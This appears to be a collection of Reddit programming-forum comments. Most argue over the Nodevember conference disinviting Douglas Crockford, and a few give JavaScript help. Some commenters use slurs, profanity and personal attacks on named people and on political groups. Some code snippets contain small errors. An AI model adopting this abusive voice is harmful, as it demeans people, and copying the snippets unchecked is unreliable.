I already knew what it was called. Couldn't seem to find anything that worked
The words you're looking for are prejudiced, intolerant, bigoted, etc. If people are going to argue semantics then just pick a better word. 
When you take someone's words, and attribute meanings or intents the speak did not themself offer, there's a word for that. It's called "slander", and it'a actually a crime in some circumstances.
Really, if people just act like normal people, things should be alright.
A good way to have your career ruined and your life partially destroyed is to be a keynote speaker at this conference. 
I think, there should be a new term for this - cyberwitch-hunt.
And evidence or not, who the fuck wants to go to a circle jerk filled with such toxic crybullies? Say the wrong thing and some cunt with an agenda will try to get you fired. Your career ain't worth the risk.
Because some people have some deeply rooted psychological issues that they've learned to use as weapons.
I think so, but I'm not sure
Well, then they can stay at home? What kind of fucked up justice system paints someone guilty without any investigation? Someone says something vaguely negative, and they aren't even *asked* what they mean, but immediate consequence is taken. Wtf.
mod_rewrite is suitable as well, you can use .htaccess to get apache to recognize /path/to/file/file.img the same as /path/file.img Super useful to allow editors to use absolute paths to resources from the root directory when your uploads folder / images folder is deep inside a folder structure you don't want exposed to your users. https://httpd.apache.org/docs/trunk/rewrite/remapping.html
Unfortunately it's a bit more pervasive than a single conference. The behavior of these SJW types borders on sociopathy, and it's creating an *actually* toxic and divisive environment. It really shouldn't be tolerated.
Now, *that* is offensive.
I'm with ya man. If I ever get sick of programming, I'm going 180 and working the fuck outside doing manual labor
Sorry, but no. What goes around needs to come around. That's how people learn. Actions -&gt; consequences.
Lol seems to be a theme: &gt; I feel no cloud of tarnish And: &gt; [Update: I’ve switched comments to ‘not visible.’ I won’t be reading them. I don’t feel the need to justify this, either. Thanks](https://medium.com/@nodebotanist/why-i-won-t-be-speaking-at-conferences-with-douglas-crockford-anymore-61bc29f028c8#.9idbhx5p6) http://i.imgur.com/9pZ0e6H.gif
Christ, if they have trouble with that, there have been people I've worked with in the past whose language must be the equivalent of genocide.
[removed]
His accusers advertise themselves as intersectional feminists. Older men ARE the patriarchy according to them. Their claim was that there wasn't enough diversity on the panel and that Doug should be uninvited as a solution (read the tweets). Ageism is one the MOST serious diversity and discrimination issues in Silicon Valley, but they choose to attack the old guy, to make themselves feel more comfortable about THEIR definition of diversity. It stinks.
Lol. So much for "inclusivity". I'm not one to buy into the whole "political correctness is destroying public discourse" angle preached by republicans, but shit like this makes me start to think twice.
I don't follow... you've linked pastebins for jszip (which is on github: https://github.com/Stuk/jszip)... I imagine your problem is with VFZip, which is for a component that wraps jszip. I don't believe jszip inherently has a 5mb limit... there are problems with how to show the download link to the user - in some cases you could be limited by max path of a browser url ([see this SO post](http://stackoverflow.com/questions/24284968/chrome-file-link-big-length-tab-crashes)).... but, [looking through the code](https://github.com/Avinava/VFZip/blob/master/src/components/VFZip.component#L46-L47), they are doing it right. The limit here would be closer to a couple GB - but in reality, likely limited by available RAM in the browser. Did you try it? What error(s) do you get when attempting to download a ZIP file &gt; 5mb? I'm not too savvy on apex but a quick boo through the code base doesn't show any inherent configurable limits.... I'd add an issue to the issue queue if you have problems with it, and include the error message. 
Call it like it is. She's an overprotected cry-bully that gets to spew her BS and shut down any opinions or people she finds distasteful, and people are tripping over themselves to accommodate it. It's disgusting and I really hope we can put an end to this shit.
Fear not, I intend to use it very sparingly. Plus it's for a game. Great script, and with Javascript clan call easily via class change.
I literally can't even but I want to.
Google libphonenumber does number formatting. So if I get things right, and you're willing to write some code yourself, you could on blur of the input get the value of the input, format it and then set the input's value to the formatted text. Having it being required should be a form property. I'm on mobile now, but I'm sure you can google your way to "required form field" or something.
You are an op there but only find out about this from reddit?
If you want a language that won't ever be infected I would recommend checking out malbolge.
Nodevember is empowering this behavior, though.
It's more of a term the movement first used for itself, and opponents like me are using it more as the term gets a bad reputation, as terms for evil things tend to do.
&gt; I just figured it was more important for me to be recognized for the actions I choose to make, rather than for the things I feel like. That's the thing. These people can't be recognized for their actions because they don't do anything.
&gt; but starting a movement for people to stop dating the other person based on what you dislike seems childish. Kind of like banning someone from a conference because of a few tweets from overly sensitive attention seekers eh? In all seriousness though, in your analogy one person is getting fired from one job. I was just following in your singular footsteps. Regardless, myself and others will not be attending Nodevember because they've shown themselves to be callow, discourteous, and willing to place the unsubstantiated and vague accusations of a few individuals over the proliferation of knowledge. This kind of intellectual and moral laziness (at best), or obscurantism (at worst) would discourage me from supporting any event or company and I hope you arrive at the same conclusion after some further consideration. Critical thinking is a good thing! :)
[removed]
But but but see, *you* are an SJW too, because you disagree with me, which means you must disagree with anything that isn't far-left orthodoxy. /s
&gt; I am sure it is only for US As described it is for people who have an US phone number. So all people inside the US who want to use whatever site OP is creating they're fucked if they don't have such a number.
Your wielding of the first person personal pronoun is an oppressive assertion.
Add salt. There appears to be plenty to go around.
He has good reason to say "JSLint will hurt your feelings."
Can we organise a conference for people who develop solely on dusty old PCs they've cobbled together over the years? Or would it get hounded into non-existence for not being inclusive?
KiA mod here. Happy to answer any questions you have about the sub. Even the mod team is pretty politically diverse. Some of us are pretty far left. Some pretty far right. We do, in general, fall on the libertarian side of the political compass. E.g. left-lib and right-lib, as opposed to authoritarian. &gt; therefore I ought to associate with a group of hatemongers Although I disagree with your assertion that KiA is a group of hatemongers, it's worth noting that tnonee wasn't suggesting that you should associate with us. But rather that your conceptual association of "KiA = alt-right" is incorrect.
Not surprised something so stupid has been allowed to happen. Far too many neutron star clenching ultra liberal lefties...
&gt; I think the sexual connotation of the word has overtaken the actual semantic meaning of the word in recent years. It's like what happened to "intercourse" a couple generations back; I was surprised to learn in high school that it wasn't just the Latinate term for the sex act (*that* word is the still-uncommon "coitus" BTW).
Thanks, I'll have a look in the morning at my browsers console. The pastebins are the files in the zip file jszip.resource. But you don't see anything in the existing code that limits it to 5MB? I scrutinised every line, but didn't see anything that says "buffer size" or of the whatnot. Thanks so much for helping!
I don't particularly like Crockford, but I hate public shaming with a passion. They could have just said that Crockford would no longer be speaking at the conference, they didn't have to include an attack on his character in the announcement. 
This is the only other person I know to have used that honorific, and maybe that's what inspired Mx. Perch: https://en.wikipedia.org/wiki/Justin_Vivian_Bond
Um... mmm.... WAT? :D
Yeah I quite like the closure. I have a question though. What would you consider to be a stateful function (do you have an example)?
When I see occasional posts from that sub, I think to myself, most of these probably are fakes. These kinds of behaviour are too ridiculous to be happening in real life. Then this Crockford thing happens.
Are you sure that no one who only lives temporarily in the US will use your site? Just making sure, because making the input accept more numbers NOW than when an angry customer calls is better, and it's infurating when you can't use a service because the provider was a dick.
I was searching masked input 
I don't understand your rudeness towards me. I understand your concern and I am letting you know that it is fine for the format to only be for us numbers. 
Sure. With a class: class CountPrinter { constructor() { this.count = 0; } printCount() { this.count = this.count + 1; console.log(this.count); } } const countPrinter = new CounterPrinter(); countPrinter.printCount(); // =&gt; 1 countPrinter.printCount(); // =&gt; 2 With a closure: function printCountFactory() { let count = 0; return function printCount() { count = count + 1; return count; }; } const printCount = printCountFactory(); printCount(); // =&gt; 1 printCount(); // =&gt; 2 These functions are stateful because the output changes with every call.
Well throw anotha shrimp on tha bar-bey!
Module refactored, readme updated.
Thanks but I really need a JS framework. ;)
&gt; The conference seems to be more concerned with being a politically-correct safespace than for professional development. From where did these idiots crawled from? it's insane how they seem to be omnipresent as of lately. I wonder if they always existed but the internet and social media blew them out of proportion actually making their diatribe noticeable for the first time. 
&gt; I just hope the pendulum doesn't swing all the way to "We're dicks, bleaahhh!" sort of posturing. Please no brogramming again ...
And you have seen evidence it is because of his race and gender? I mean these Reddit comments where white men pretend to care about racism and sexism because they feel it's a witty attack on the "sjw" strawman aren't proof of anything.
Homophobia and sexism were considered normal until some time ago and to many people they still are. But I get the the thing we are really doing here is protecting the feelings of white men.
I'm not saying it's appropriate to talk about the genetalia of any animal as a speaker at a conference. It's crude and may well be inappropriate, depending on the context I guess. I am saying that it shouldn't be more or less offensive to either gender listening to that talk simply based on their gender. Talking about dog balls has no relevance to salary inequity.
Ok that makes sense. In my example: export class ModelsRepository { constructor(models) { this.nextId = 1; this.models = models; } getModelById(id) { return Promise.resolve(this.models.filter(model =&gt; model.id === id)[0]); } createModel(model) { model.id = nextId++; this.models.push(model); return Promise.resolve(model); } ... } That code is simplified, but you can see that it's mutating the state.
Please explain what in Crockford's behavior hurts the feelings of anyone. Also, please explain why you think the feelings of these groups are better protected by publicly kicking Crockford out as opposed to asking Crockford to release some statement or quietly asking him to remove himself. And please be specific.
Political alignment, don't give a fly and not in the U.S. Most of the "issues" over there aren't prevalent here. Rainbow colored hair was somewhat of an identifying remark to two/three people, without naming names. Cheapshot yeah but basically, if you aren't in this hipster niche then, for example if you're a grouchy old boring balding man like Crockford then screw you. Edit: What the heck is alternate left and right? I get political left and right, has political alignment turned into a DAG? Anyhow, my definition left/right will differ from yours, different countries different politics. Another thing to consider in the name of "inclusivity". 
Just don't use JS dude, JS is a really shitty language and moreover, the community is full of people that never takes CS class, just finished CodeSchools and label themselves as "full stack developer". Use system programming like D or C++ or even Ruby you will never find this kind of crap. 
I honestly think this person being irritated by all of us who are irritated is the most irritating of all. Stop whining and let us have a discussion.
I believe aikiku is talking about the ageism in the pursuit of gaining employment. Experience is valuable, but try getting a job at 50 and you'll find something else happens.
Why? My post is not about him. It's about the general idea that what society considers "normal" can often be oppressive. The sentiment here is that these types of behavior should not be challenged *at all*, this entire charade got this amount of attention because it's extremely easy to use it as an example that *all* engagement is actually just the evil sjws attacking white men (this is what people\^R white men on Reddit and 4chan quite literally believe).
&gt; try getting a job at 50 and you'll find something else happens. I thought this was still a good age to land a job in IT. Wrong ?
It's only one level down to the next level, what if I don't tolerate "not tolerating intolerance". not tolerating intolerance should not be tolerated not tolerating not tolerating intolerance should not be tolerated not tolerating not tolerating not tolerating intolerance should not be tolerated not tolerating not tolerating not tolerating not tolerating intolerance should not be tolerated not tolerating not tolerating not tolerating not tolerating not tolerating intolerance should not be tolerated same as missiles, anti-missiles, anti-anti-missiles 
&gt; If you have a way of coding it for multiple types of numbers, then please show me how Sure! Just make it a text-inputfield! If you need to pass it to a human, just show it as entered. If you need to pass it to a computer-system, strap everying but numbers and the "+" character on the server. There is a reason why big sites such as [web.telegram.org](https://web.telegram.org) and even [Google](http://i.imgur.com/JSoIdtN.png) just use a free-text for it. If you want to, you could also use something like [intl-tel-input](https://github.com/jackocnr/intl-tel-input) - at least in the demo it [looks great](http://jackocnr.com/intl-tel-input.html), defaults to the US, and kind of does what you want. 
You're right. Good point, thanks! They are so natural to me, as well as for Redux community, so I personally assume them nearly accepted, but there is always a chance for rejection.
I have no opinion of this situation either way because I only saw the title of OP's post and wanted to know what it was about. But I suspect you are right on why it's such a thing. For instance, this is on my reddit front page... anyone who subscribes to /r/javascript now knows about it. The Internet and especially social media have a way of amplifying controversy and animal photos.
I sympathize with the matter too, but I guess 6 links in the hot Reddit tab for this sub about this thing are enough already.
in IRC an OP is a moderator of a channel, it stands for "OPerator". https://en.wikipedia.org/wiki/IRC_operator
/r/outoftheloop ?? WTF has happened? Did Crockford came out waving nazi flag or what?
Hitler was less German than Crimea is Russian.
I agree with what you said. I just find this part hard to believe: &gt; Are some people going to jump on the bandwagon because it suits their Anti-SJW agenda? Sure. But that doesn't mean it's the main thing here. Jumping on the bandwagon and injustice towards Crockford are *not* mutually exclusive. People in this thread are making things up to make this seem worse than it is, there's even a guy who used "cuck" and "mangina" and he got compassionate replies about not being too hard on himself. Political motivation of these posters coudn't be more evident. It's not about justice for Crockford. The sentiment is obvious: this community is against social justice, and the most useful tool they have to fight it is misrepresenting the entire movement . Evidenced again by people posting TumblrInAction as some sort of unbiased window into social justice. I'm not saying bad things don't happen, I'm saying Reddit and 4chan *enjoy* when they do: several years after the Donglegate thing happened, for example, there were **still** *daily threads about it* on /g/. It's outrage culture and identity politics for internet reactionaries.
Same thing started to happen with JsConf talks some time ago. 
How was it racist if the accusations were led by only white women?
+10 . I feel exactly the same.
* Step 1: Decide you're a victim. * Step 2: Scrape for evidence. In fairness, the thing about huevos being tied to bravery is pretty pure sexism. But it's also the only fair criticism I've seen in this debacle. When he compared trailing parens on IIFE's to being out there like a dog's balls, and people complained about that being sexist, I just couldn't take it seriously. "Someone mentioned balls!? I'm triggered!" It's ridiculous.
I tried with chrome and it worked just fine. Something's wrong with safari apparently.
So what we have is this: 1. Nodevember does something wrong to Crockford. 2. People get upset about that, and make threads discussing the injustice done to Crockford. 3. Anti-SJW people jump on the agenda, and participate in the same threads. 4. You decide that because 3. happened, the outrage about 2. is false and this community is focused on 3. more than 2.. That is cherry-picking. Personally I have nothing to do with anything Anti-SJW and I don't care if people want to self-identify as unicorns. I am annoyed when major contributors are publicly shamed for no apparent reason. The fact that you wrote: &gt; the most useful tool they have to fight it is misrepresenting the entire movement. is kind of ironic, because you are doing pretty much the same thing to this community.
You could use normal jQuery UI events and then include the touchpunch library
Mainstream JS culture is not particularly "bro-y" today. I'm fairly certain the complaint about React was invalid -- nobody seems to have been able to produce any examples for bro-y-ness in the React community and my personal theory is that the person making the complaint was actually mis-reading some of the playful shittalking between some of the more prominent devs. However there was a significant period of "brogrammer" culture, especially in the Ruby community and (via Ruby devs moving to Node) in the JS community (though to a much lesser extent). There were smaller instances of it elsewhere too, but those seemed to have been the most widespread ones. However the mainstream focus in both Ruby and JS has moved on since and (as a reaction) turned 180 degrees: Ruby is dominated by groups trying to include minorities, women and children (and recently in Europe: refugees), JS (mostly via the efforts of npm and hoodie who are involved in JSConf and the Node.js core community) is very inclusive as well. An example of "brogrammer culture" were startups like Twitter with a strong focus on physical fitness and drinking. If you looked at these companies in closer detail you'd realize this isn't simply a unique property of these startups but a direct consequence of the people at these startups: the median age is very low, a lot of employees were fresh out of university or college drop-outs and they simply brought their college culture along. I'm very confident the SJW shift we're now seeing is exactly the same: American universities are currently heavily dominated by SJW culture, so college grads/drop-outs joining/founding startups will bring that culture along with them. Arguably the new culture is better than the old one because its wastefulness tends to go towards social causes more than hedonism, but incidents like Nodevember (or the attempted boycott of LambdaConf) are one of the nastier examples of how this culture can be harmful too. I think the biggest problem is the community's forgetfulness: brogrammer culture didn't *cause* underrepresentation of women and minorities (though one could argue that e.g. the JS and Ruby communities actually overrepresent some minorities -- which is obviously not a bad thing in itself), those groups were underrepresented before brogrammer culture even became a thing. It's ultimately a complete lack of understanding of the wider causes and effects.
Rejection, or syntactic/behavioural changes, which will require rework later on as well. This might be acceptable, but it should preferably not be a surprise when that time comes.
In trouble for what? Having a different set of values and beliefs?
Except because the accompanying joke he used 10 minutes before the 'huevos', is about 'chicharrones', which have no double-entendre. All of this because at the beginning of the talk he says you don't need to learn Haskell to understand monads, in the same way you don't need to be a qualified chef to make a burrito. When you give context, the innuendos and sexism disappear. The funny thing is that the moment Crockford becomes a target of their PC wrath, there's nothing he (or anybody, for that matter) could say to stay safe from their accusations. "If you have the 'guts'..." -&gt; "Oh, I don't identify myself as an animal, but as a plant. I don't have guts! You are being insensitive! I won't attend any conferences you attend to!!"
There's nothing to worry about. The patent clause just says you lose your patent grant if you're suing Facebook for patient infringement. Don't sue Facebook.
&gt; So what we have is this: No, we don't, because you're ignoring the wider political context in which all of this happens. This isn't happening in isolation, it's happening on Reddit and 4chan, two communities who are by and large the main opponents of the social justice movement. It's the same two sites which gave birth to GamerGate, for example. It's the same two sites which almost exclusively focus on one side of the story with clear political motivations: SJW is a slur that pops up in every other thread, the climate is undeniable. Now, you can say that this is completely unrelated, and that everyone's motivations in this thread are completely sincere and focused on Douglas. And in response I can simply point you to the guy posting an article about how outrageous it is for the American military to have sensitivity training about Islam. Why? It proves my point that people here are motivated not by genuine concern for anyone's well-being, but by participating in the fight against social justice. They post enraging stuff related to the topic by just one single vague notion of "oversensitivity", thereby removing focus from Douglas, and onto the fight against what they perceive to be social justice and its values. &gt; is kind of ironic, because you are doing pretty much the same thing to this community. What part of what I'm saying is misrepresentation? Ctrl+f-ing "sjw" brings out like 20 results in this thread. There are people saying "cuck" and "mangina" which is not questioned. As I said, it's evident that *this community* has picked a side, and it's not social justice.
Huh, its good to know this exists. I'll have to try it out a little later. That said, I think I found my solution: returning the file itself from a PHP script seems to hide the server path. At the very least, I can't find it. Thanks for the help though!
Here's a great guide from [digital ocean](https://www.digitalocean.com/community/tutorials/how-to-set-up-a-node-js-application-for-production-on-ubuntu-16-04) which covers setting up node on ubuntu 16.04. It covers: process managers, https, reverse proxy. There's also guides for older versions and probably other OSes (maybe - I've not looked). I always find their guides a good start to setting up a node server.
This is interesting. But I noticed the implementation of `rxConnect` doesn't utilize the main react-redux `connect` code. A couple things: * This loses all the optimizations `connect` does to prevent unnecessary re-renders. * You're subscribing to store changes in `componentWillMount`. This will cause a memory leak if used during server-side rendering, because `componentWillUnmount` does not get called. * The fix for that is to move it to `componentDidMount` which will cause you several other issues, including store notifications being fired "bottom-up". The solution to that is to implement a hierarchical subscription model, a change coming in react-redux 5.0 (currently in beta). Another issue cause by that fix is then a staleness that can happen when a child component dispatches an action in its `componentWillMount`, which `connect` handles for you. There's a new method in the react-redux 5.0 API named `connectAdvanced`. It's the base implementation for `connect`, but separates away the logic of combining `mapStateToProps`, `mapDispatchToProps`, and `mergeProps`. I wonder if you could build `rxConnect` to be a wrapper around `connectAdvanced`. See [PR 480](https://github.com/reactjs/react-redux/pull/480/files) for the work-in-progress docs.
Have you tried changing const for var and seeing if you have the same issue?
Cool, thanks for your notes! &gt; This loses all the optimizations connect does to prevent unnecessary re-renders. Why so? Can you provide more details here? Regarding connectAdvanced - I'll definitely look at it! Thanks!
0.5 nexxy stated she wasn't going as the venue is on a white male Christian university campus, because reasons. It was probably chosen because it was cheap with the requisite amenities for hosting a code conference, but nothing more was said about it. So, someone who wasn't going anyway because of where it was then decided to look at the list of keynote speakers and 1. happened to "reinforce" her "point". 1.5 After this tweet appeared, a speaker said she wasn't happy with Crockford being there as well and supported nexxy's stance. In other words, she joined in with the call to remove Crockford only after an already acknowledged non-attendee made a fuss. Not knowing who else is going to speak at a conference you're speaking at seems a little odd, as does the timing of the call for removal. Then 2. happened. I only know this because I was "fortunate" enough to see it happen in real time.
They were also invited speakers. The conference made a choice based upon the situation of which to uninvite for their own reasons. At that level its not even about investigation, it is up to the organizers to decide. I am positive that some investigation / conversation went on during the decision process.
I don't know whether you truly don't understand how communities work, or whether you're pretending not to. Either way this is a huge strawman. Not **all** posts in a community express explicit sentiment. Despite what the alt-right believes, saying "cuck" 100x times is not a sentence through which you can communicate anything constructive. I'm not accusing this community of being *only* about right-wing politics, that's absurd, I'm accusing it of holding a general sentiment, and pretending not to hold it. The same goes for /g/. The nominal topic for that board is technology. 90% of posts **are** about technology. However, there are posts which make fun of feminists, social justice activists, try to entice rage in the community against certain topics, etc. Statistically, these are in minority, but their success and *acceptance* is what shows the general sentiment in the community. If you have daily threads where people express outrage about something stupid a feminist did 5 years ago: do you think people who aren't hostile to social justice would feel welcome in that community? In a thread explicitly about technology, if someone posts something like "women are dumb and can't program as good as men" -- **and the rest of the community just accepts it and doesn't challenge it** -- would you think that's not indicative of a problem? (Not saying this happens on /r/javascript, it obviously doesn't, but much worse things to happen on 4chan, I'm talking about sentiments and tendencies here.) &gt; All it proves is that this particular guy exists. Statistics do not work with N = 1. That is cherry-picking, and your conclusions are not supported by your evidence. So for you to consider my experience, that I share with many others both inside and outside the mentioned communities, it would take a thorough statistical analysis of all actual beliefs and behaviors people in these communities exhibit -- despite that being practically impossible? Sorry m8, when someone asks rigorous mathematical proof for perspectives they don't agree with, and continues accepting those which don't bother them, it's not proper skepticism, but denial. And did you apply the same rigorous standards to all the numerous posters accusing SJWs of something in general? After all, these are just singled-out examples of bad behavior, not a trait of their community! You didn't. You replied to me, practically the only person with a dissenting opinion in this entire thread. Who's at like 10 downvotes. The irony is that *your behavior* proves my general point: communities defend their culture and shared beliefs. In this community's case, the shared belief is that social justice is bad.
I imagine it's about unexpected input and fragmented/malicious queries. It's easy to ddos a "web server" that hasnt been hardened with fragmented requests. It's also possible that there is an error in node itself that allows priviledge escalation via sending malformed packets. If you put nginx (or some purpose made reverse proxy) in front of node, there is a chance you can use the expressive features of nginx to filter out certain kinds of packets before it gets to your node app. Of course, there are even more special purposed firewalls that can do this, but i think having nginx (or some other reverse proxy) that's been hammered on and used by other people (and also getting patches and bug fixes specifically for malformed requests) is safer than just bare node (and your app - which may or may not have been security audited and reviewed) facing the internet.
It would probably be crashed by hypersensitive "SJWs" (Social Justice Warriors).. We'd need to screen them somehow. Like maybe say "Dog balls" at the gate and see how they respond.. 
You could potentially look into a JSONPath implementation. JSONPath has a recurse operator, so your query would be something like `$.a..c` where it would recursively search for `c` in the prop `a` from the root `$`. There are quite a few implementations and I have written a fast one myself but it isn't documented so i'm hesitant to give it out. 
This doesn't seem an appropriate subreddit.
Wouldn't really consider him an Academic, nor Crockford. JavaScript just doesn't breed that kind of culture and people. But yeah, read his book also, it's available online for free! :)
Hmph, might want to refrain from naming. Out of my control tho, so I distance myself from responsibility ;)
Any of the constructors/factories failing? (throwing errors) Btw, if you're using a bundler.. import/export rather than stuffing it in window. Wrong order is a likely candidate for undefined. Hard to tell with a non reproducible example.
Actually throwing things on the window object in the "real" code rather than using import/export? Wrong inclusion order is a likely candidate.
If you liked that, you'll love "congress", "service" and "cover". The latter two are common terms in animal husbandry... ... hmm. "Husbandry". There's a good word to get triggered by, as "wifery" isn't really used any more (though there is midwifery), probably on purpose by those who... *froth* *snarl*
Which, in its time, was a revolutionary tool for js devs. He programmed to much of his dogma into it and refused to evolve, so now the alternatives are far superior.
&gt; One thing I do not have a habit of doing however is making references to developers of different ethnic or religious backgrounds. I have to admit that I don't know *exactly* what you mean here, since this sentence is written in such a way that it expresses a claim that is definitely false (simply because all of us, by talking about *any* developers at all, have thereby made references to developers of different ethnic backgrounds, since *all* developers have ethnic backgrounds). What I suspect you mean is something like this: either (a) "I do not have a habit of making references to the ethnic or religious backgrounds of developers" or (b) "I do not have a habit of making references to ethnic or religious groups of developers" (or, *maybe*, even something more general, like, "I do not have a habit of talking about ethnic or religious groups"). In any case, it seems likely to me that none of these claims is true, either (particularly if we take "ethnic" to have a meaning inclusive of "race-related"). At the very least, you do seem to have a habit of referencing ethnicity or religion (especially ethnicity), sometimes with specific reference to developers and sometimes with a more general reference to classes of people that surely include developers as members. A very quick glance at your Twitter account reveals that a large portion of your recent tweets or retweets are specifically about the race -- the whiteness -- of either developers, males, or even "most white people" in general, and not a few of those tweets are generalizations that are dubious glosses over whole classes of people without much regard for the diversity of individuals within the class (e.g., tweets about what "most white people" allegedly "actually believe"). There is also at least one recent tweet referencing the sex -- the maleness -- of developers and a religion -- Christianity -- in a way that suggests that you take it to be relevant to a developers' conference ("A JavaScript conference with all-male keynotes at private Christian university. What a stellar show of inclusivity.") I tweeted to you that one of these generalizations was just that -- a dubious generalization about a large class of people that lumped them together on the basis of their skin color, and that seemed anti-inclusive with respect to those people. Your only response was to block me on Twitter. Perhaps this is because I included the #nodevember hash tag, but I am not sure. (I included it because it seemed relevant to the nodevember discussion, just as it is here.) I don't really know whether you care for personal testimony concerning how such behavior makes people feel. In case you do, though, it makes me feel not welcome at places where you might be present.
I've never developed using a Mac and I've been doing this shit for 20 years. And yes, I started with a PC I built myself.
She's a developer evangelist for @salesforce -- basically a public element in the developer community, she publicly (on Twitter) called for a boycott of Nodevember immediately based on the fact that the keynote speaker lineup was not diverse enough, that the venue was a private Christian college and that Crockford made people uncomfortable. Nodevember offered to add diversity to the keynote. She demanded they pull him. And they did within 41 minutes. If anything is especially rough in tech, it's ageism right now... I think she's done a terribly good job of ripping the development community apart. (Generally I would agree about not naming people on forums like that -- but I think when the public relations arm of a company engages in these kind of things, it's similar to discussing celebrity figures)
The silence is deafening.
Crap title. What is it about? Async/await?
Would you be able to link to a specific comment? I haven't encountered anything you describe in my admittedly inexhaustive browsing! My concern in these situations is that the voices which shout the loudest and are most easily heard are those from both the "alt-right" and the "regressive left", with everyone else ushered out of the conversation. Contrary to my fears, I have found reddit discussions on the Crockford/Nodevember incident to be surprisingly grounded.
&gt; Update: I’ve switched comments to ‘not visible.’ I won’t be reading them. I don’t feel the need to justify this, either. Thanks In my saaaafe space
Womansplaining? No thanks. 
Video and audio is out of sync.. it's a little bit hard to watch. 
TL;DW: use async/await
Did you not read the Nodevember Slack chat? The Nodevember organizers blatantly complain about the fact that the majority of presenters are "white dudes" (their words) and that something should be done about it. If you honestly think that they don't have a personal vendetta against white men, you are either not paying attention or being very disingenuous.
XML-RPC FTW!!!
You really think they'd disinvite him? If the the most influential JS writer ever were black, there is exactly a 0% chance this would have happened. 0. This has everything to do with Crockford's gender and race.
Are you famiar with these imbeciles? Yes they act like spoiled kindergartners and want to dismiss and punish anyone normal who doesn't buy the horseshit they are peddling. And idiots continue to cater to their demands. 
Wow thats harsh. 
&gt; They are essentially defaming this guy for attention I already know the answer to this question, but what are you even basing this on?
\#AllPacketsMatter I don't discriminate between udp and tcp, our applications and networks should be open to accepting any traffic, well formed or not.
 Boycotting your racist "camel case"
&gt; However, the balls/gonads/chicharrones/huevos thing is pretty juvenile and yea exclusionary. What if a female speaker made a reference to ovaries? Would that send you running? MY GOD WHO THE FUCK CARES?!!
It's because you're saying you're scared of a mild reference to balls.
Non sequitur.
Yeah, DO has pretty good content. Gotta respect them for that!
Maybe by branding him an "unsafe" and "problematic" person for unspecified "reasons" who cannot be allowed to speak in front of people? Whether they are doing it for attention or are just totally retarded is an open question, I suppose. But either way they availed themselves of his name to market the event and sell tickets in the first place.
Process managers are great. What do y'all think about using systemd to manage node?
But, Justice can only be understood in the context of that which is moral or ethical and the laws people create based on their understanding of what is moral/ethical. But if history shows us anything, it is that what humans consider to be moral/ethical changes over the years. Some seem to think that that which is considered moral/ethical is gradually moving toward some mythical golden perfect standard that will result in perfect justice, but that smacks of the same nonsense as those who believe that evolution has a grand plan and humans are the ultimate manifestation of that plan. Evolution has no plan and human-set morals have no ultimate end point. For example, I could see climate change causing such wide spread chaos that that which we today find immoral and reprehensible becomes common and moral in the future. 
&gt; &gt; Free expression of football. Uncategorisable. Is that a word? It is now! You know? Far cry from small boys in the park, jumpers for goalposts. Rush goalie. Two at the back, three in the middle, four up front, one's gone home for his tea. Beans on toast? Possibly, don't quote me on that. Marvellous. ~ */u/PrometheusZero*
Agreed... These kids* bite the hand that feeds. (*) I think they are actually older than I am, but they definitely aren't acting like it.
Yes, together getModelById and createModel are stateful functions in this case, if this is what you want to do. 
Can't wait to see this circlejerk for the next month straight
It turns out that "alt-right" is a primarily American term, but it has parallels with the rising xenophobic and white-nationalist movements in Europe: https://en.wikipedia.org/wiki/Alt-right Also, thanks for the clarification, because "rainbow-colored hair" is also a stereotype of the kind of people who take issues of social justice seriously.
I don't think Crockfords feelings are really what's at stake. I think what people are concerned about is that we are pushing away one of the most important contributor s to JavaScript code quality for trivial reasons.
Good content, and AMAZING service. I've filed a few tickets with them and have always gotten a detailed response within the hour. I highly recommend them as a host for all levels of deployment.
There's a reason why hiring managers and HR personnel dig through an applicant's social media profiles and it isn't in hopes of finding a photo of you with a beer. Any company that hires someone like this is opening themselves up to a lot of professional and PR liability.
if you're using 'use strict'; window is no longer the default global namespace. You have to use `console.log(window.myApp)`
Well, the title is "10 things you shouldn't do".
There are two senses in which this is accurate, but it doesn't cover all cases of social/medical/surgical transition: First, although Iran is a special case (gay men have a choice between transition and execution), it's common in non-Western societies for sexuality targeted at the same sex to be considered linked to the gender roles of the opposite sex, but [as a special category of those roles](http://psi.sagepub.com/content/17/2/45.full#sec-19): &gt; The manner in which same-sex sexual attraction is publicly expressed varies across time and cultural space (Blackwood &amp; Wieringa, 1999; Murray, 2000; Norton, 1997; Whitam &amp; Mathy, 1986). Same-sex sexuality between adults typically takes one of two cross-culturally recurrent forms, which are related to gender-role enactment and gender identity. These two forms are cisgender and transgender male androphilia and female gynephilia. Then there's the trend in the West, along with the greater awareness and acceptance of transsexualism, of identifying gender dysphoria in ever-younger children, even though the overwhelming majority of cases of GID in young children go away by puberty, with the great majority of those cases ending up gay, and only a small portion, who can't be easily told apart from the rest, still have gender dysphoria later on: https://psmag.com/why-transgender-kids-should-wait-to-transition-c989b21c9179 (N.B.: The converse is not true; most gay and bisexual cis people wouldn't have met the criteria for GID as kids and didn't even have significant cross-gender interests, just a higher proportion than among straight cis people.)
The funny thing with all of this is that Crockford's presence would help to legitimize their conference from a marketing stand-point. Him speaking there is not going to offer any real advantage to his own professional standing. He was doing them a huge favor by agreeing to speak there. Rejecting him will ensure that he never agrees to participate in their conference again and will discourage other high-profile people from supporting the conference. I just hope that this doesn't cause him and other speakers to reject other small/start-up conferences that could greatly benefit from his involvement.
[removed]
I don't agree. Had a server on DO shut down without any warning or explanation, and with no answer from support. Cancelled my account shortly after.
exactly, your actual freedom of speech is gone
Could you rehost it somewhere that doesn't block Tor? Here are some suggestions: [pst.moe](https://pst.moe/), [ix.io](http://ix.io), [sprunge.us](http://sprunge.us)
this is great, more fodder for the clickstream! thx dawg
Just use bug/ticket tracking software. Don't roll your own. 
This is exactly the point. People are not irrelevant. If you're not appealing to authority who are you appealing to? If you're not defending this person, then you're defending his acts. Acts that aren't even worth defending. Why are sexual organs and sexual deviance being discussed at a technical forum? It's completely outside of the scope of whatever is being explained. Analogies only work because people are able to relate between the relationships between the words. It's ineffective in its delivery if the message is misconstrued by the audience. Obviously that is without a doubt the case in this situation. Sex is complicated and requires way more discussion to understand than Javascript. People are more complicated than machines. If you want to understand why gonads and promiscuity isn't appropriate in a room of engineers, discuss it amongst the half million subscribed to /r/sex not in this "i can't say anything or write code because of sjws" circlejerk.
This is a sub about JavaScript, a very different language from Java. I recommend taking a look at a Java sub (/r/learnjava if I were to guess at a name). I also recommend drawing the problem on paper to get an understanding of what you're trying to do.
Damn this is amazing thanks for sharing this.
